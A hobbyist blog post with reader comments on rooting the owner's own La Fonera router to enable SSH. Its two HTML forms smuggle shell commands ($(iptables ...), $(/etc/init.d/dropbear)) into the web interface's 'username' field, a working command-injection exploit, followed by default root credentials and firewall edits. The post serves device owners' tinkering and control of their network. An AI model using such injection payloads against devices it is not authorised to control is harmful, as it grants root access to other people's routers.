Hacking Fonera
Yesterday I received my Fonera. The last two days i spend on trying to run an ssh daemon on it. After a lot of searching and surfing, i found finally with the help of this two sites a way to force fonera run ssh. I will shortly sum up the hack, it worked successful with 0.7.1 r1 fon firmware (if you have the 0.7.1.2 firmware you have to reset it.):
First you have to write to two html-pages which will inject code in your Fon-Router. Save the following code as step1.html:
Save the next html code as step2.html.
Now connect to your MyPlace Network, open the both sites and just click on the "Submit" button(first at the step1.html then on the step2.html page). Open your favorite shell and connect to your router via ssh with username root and password admin.
For enabling a permanent ssh access you have to move dropbear to S50 dropbear:
In the
Now you should prevent Fon from executing received code, by editing
Now you have ssh daemon on your fonera.
btw: thanks a lot cologne.idle and "ПожалуйÑта не пойте под фанеру!"
<html>
<head>
</head>
<body>
<center>
<form method="post" action="http://192.168.10.1/cgi-bin/webif/connection.sh" enctype="multipart/form-data">
<input name="username" value="$(/usr/sbin/iptables -I INPUT 1 -p tcp --dport 22 -j ACCEPT)" size="68" >
<input type="submit" name="submit" value="Submit" onClick="{this.form.wifimode.value='";' + this.form.wifimode.value +';"'}" />
</form>
</body>
</html>
Save the next html code as step2.html.
<html>
<head>
</head>
<body>
<center>
<form method="post" action="http://192.168.10.1/cgi-bin/webif/connection.sh" enctype="multipart/form-data">
<input name="username" value="$(/etc/init.d/dropbear)" size="68" >
<input type="submit" name="submit" value="Submit" onClick="{this.form.wifimode.value='";' + this.form.wifimode.value +';"'}" />
</form>
</body>
</html>
Now connect to your MyPlace Network, open the both sites and just click on the "Submit" button(first at the step1.html then on the step2.html page). Open your favorite shell and connect to your router via ssh with username root and password admin.
ssh root@192.168.10.1
For enabling a permanent ssh access you have to move dropbear to S50 dropbear:
$> mv /etc/init.d/dropbear /etc/init.d/S50dropbear
In the
/etc/firewall.user
you have to uncomment this lines:# iptables -t nat -A prerouting_rule -i $WAN -p tcp --dport 22 -j ACCEPT
# iptables -A input_rule -i $WAN -p tcp --dport 22 -j ACCEPT
Now you should prevent Fon from executing received code, by editing
/bin/thinclient
. You have to comment the last line and add another line, so that the last two lines look like this:#. /tmp/.thinclient.sh
cp /tmp/.thinclient.sh /tmp/thinclient-$(date '+%Y%m%d-%H%M')
Now you have ssh daemon on your fonera.
btw: thanks a lot cologne.idle and "ПожалуйÑта не пойте под фанеру!"
Verwandte Links:
Trackbacks
Alessandro "jekil" Tanasi blog am : Hacking La Fonera
Vorschau anzeigen
Today i received my Fonera.Fonera has been designed not to be hacked. Really?Hacking the La FoneraOpenWrtDocs HardwareDd-wrt about La FoneraLa Fonera FlashingHacking FoneraOpenwrt K on la Fonera without serial consoleLa Fonera dissection and hackInside th
Coding my Life am : Fonera Downgrade
Vorschau anzeigen
If you want to downgrade your fonera from 0.7.1.2 firmware to the 0.7.1, look here.
Kommentare
Ansicht der Kommentare: Linear | Verschachtelt
Aschenbash0r am :
=
Please do not sing under plywood!
I copy&pasted it into an online translator
kalkin am :
ARARAT am :
Chance am :
kalkin am :
Chance am :
Thanks
matyas am :
I have just came accross your website. I have received a fonera too, and i have some (maybe stupid) questions: why is it good that i can have an SSH access to my fonera? what is the advantage of that? and why is it good for me that i prevent FON from executing code on my box?
thank you very much
Matyas (from Hungary)
Riku am :
You can access to that Linux and make some changes. It's also more secure than just telnet.
> what is the advantage of that?
You can make changes.
> and why is it good for me that i prevent FON from executing code on my box?
It's security thing. FON box will execute every code it will receive from FON with out these hacks.
Jay am :
Can anybody help me?
Fabs am :
kalkin am :
geek am :
instead of this:
#. /tmp/.thinclient.sh
cp /tmp/.thinclient.sh /tmp/thinclient-$(date '+%Y%m%d-%H%M')
use this:
if [ -s /tmp/.thinclient.sh ] ; then
for f in /tmp/thin* ; do
:
done
if [ -f "$f" ]; then
if [ $(md5sum /tmp/.thinclient.sh | cut -d ' ' -f 1) != $(md5sum `ls $f` | cut -d ' ' -f 1) ] ; then
cp /tmp/.thinclient.sh /tmp/thinclient-$(date '+%Y%m%d-%H%M')
fi
else
cp /tmp/.thinclient.sh /tmp/thinclient-$(date '+%Y%m%d-%H%M')
fi
fi
This way a new thinclient "log" will only be created if it differs from the last one and if it's not empty. Code isn't probably very beautiful, but it seems to work
kalkin am :
fon-fan am :
do you have some more informations, links to threads on the forum?
am i right that linux 2.6 is the only thing to be ported ?
kalkin am :
There is a forum thread about ddwrt on fonera.
Fabs am :
Late am :
futejia am :
I am waiting for dd-wrt. Yeah!
Btw: the serial console sucks. I tried for more then two hours to use it.
Barol am :
Jimmi am :
Diese Sache muss man unterstützen, nicht
hacken !
futejia am :
2) Ich glaube Google und Ebay haben genug geld. Die brauchen unsere Unterstützung nicht.
Stefan Tomanek am :
http://stefans.datenbruch.de/lafonera/
and especially http://stefans.datenbruch.de/lafonera/whywedidit.shtml
It's not about sabotaging FON, it's about keeping in control of your network.
jarena am :
jarena am :
jarena am :
At last the problem was La Fonera was taking too long to get an ip via DHCP, and while this is not done the public network can't be seen. I don't know is this is just normal, but I think so, because I read before the flash memory of La Fonera was quite slow, extending startup time.
Maurizio am :
kalkin am :
I have the same problem, if i'm changing from fixed ip to DHCP. The change take really long.
I've made experience that the best way in this cases is to restart the fonera.
Maurizio am :
Normally, the DHCP server on my modem/router assigns IP addresses to other network devices in a few seconds. Besides that, I've tried to restart the Fonera, with no effect.
cable am :
You should change the web server address to 169.254.255.1 instead of 192.168.10.1. Both in the html page and the ssh session.
Rui Ponte am :
kalkin am :
You take something spiky (for example a pin) and press the reset-button, below the fonera, for 5sec. It should be reseted to the 0.7.1 firmware.
Torbar am :
Rui Ponte am :
Stefan Tomanek am :
There is a new hack (this time called "kolofonium"), however we are not releasing it until 0.7.1.2 has become widespread on new routers - otherwise, it would be wasted
Paul am :
Tiago am :
Stefan Tomanek am :
Michael Henn am :
Thanks for any help from anyone!
sp00nix am :
google the VI command list, its kinda confusing how to work
narmacil am :
@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! @
@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that the RSA host key has just been changed.
The fingerprint for the RSA key sent by the remote host is
23:55:f0:ec:9e:61:24:e8:8e:a5:0d:79:f0:85:65:64.
Please contact your system administrator.
Add correct host key in /home/Administrator/.ssh/known_hosts to get rid of this
message.
Offending key in /home/Administrator/.ssh/known_hosts:1
RSA host key for 192.168.10.1 has changed and you have requested strict checking
.
Host key verification failed.
narmacil am :
Smiley am :
kalkin am :
Josh am :
kalkin am :
Antonio am :
Hope you enjoy ...and improve
Antonio
Wenle am :
$> mv /etc/init.d/dropbear /etc/init.d/S50dropbear
it responds -ash: $: not found
what does that mean? should i continue to second command?
kalkin am :
mv /etc/init.d/dropbear /etc/init.d/S50dropbear
Takenover83 am :
I have my Fonera hooked up to a WRT54GS.
Also what local webserver work ok with this guide? I tried a couple, but got error's when using wget.
For example.
Using "wget http://127.0.0.1/nameofthefile" just gives me a forbidden type of error.
But when I test the same link in a webbrowser, the webserver works just fine and allows me to download.
Paul am :
Paul am :
i was absolutely convinced that my router was 7.1.2 firmware, but after pulling my fon open (easy!) and looking, yup, 7.1.1. use coldtobi's page to reset the right way, and you'll be able to play soon yourself!
john earthquake am :
kalkin am :
Popup2u am :
dltv am :
Most importantly can you connect to the router via the Ethernet port with DDWRT? or does it have to be wirelessly? because i cant connect to 192.168.1.1
or whatever the right ip is i still cant connect to the DDWRT interface via ethernet cable only wirelessly
Wrote a tutorial on hacking it at dltv.wordpress.com
grazzt am :
I dont have any wifi cards yet.
I see the 192.168.* is for the wifi side.
The manual states to set static ip for nic to 169.254.255.2. When I do this, I can check the status of the fon by going to http://169.254.255.1 (and showing 0.71 r1 as the firmware).
Any help would be appreciated.
Thanks
grazzt am :
ANd it worked!
ssd am :
yea am :
dna am :
anyone send me e-mail that attached it?
kalkin am :
jeff am :
Muhammad Waqas am :
dltv am :
Gives some networking advice.
grazzy am :
Then the FON listens to port 8080 on the wan side.
Hope this helps anyone.
Jürgen am :
Strafverteidiger München am :
http://dltv.wordpress.com/off-the-wall/a-guide-to-hacking-the-la-fonera-wireless-router/
But as well a helpfull information.
Strafverteidiger Freiburg am :
eric am :
http://www.fonerahacks.com
kenjiru am :
Any idea what to do now?
Computmaxer am :
www.fonerahacks.com
nglrossi am :
I am about to install dd-wrt now.
Angelo
Johnny am :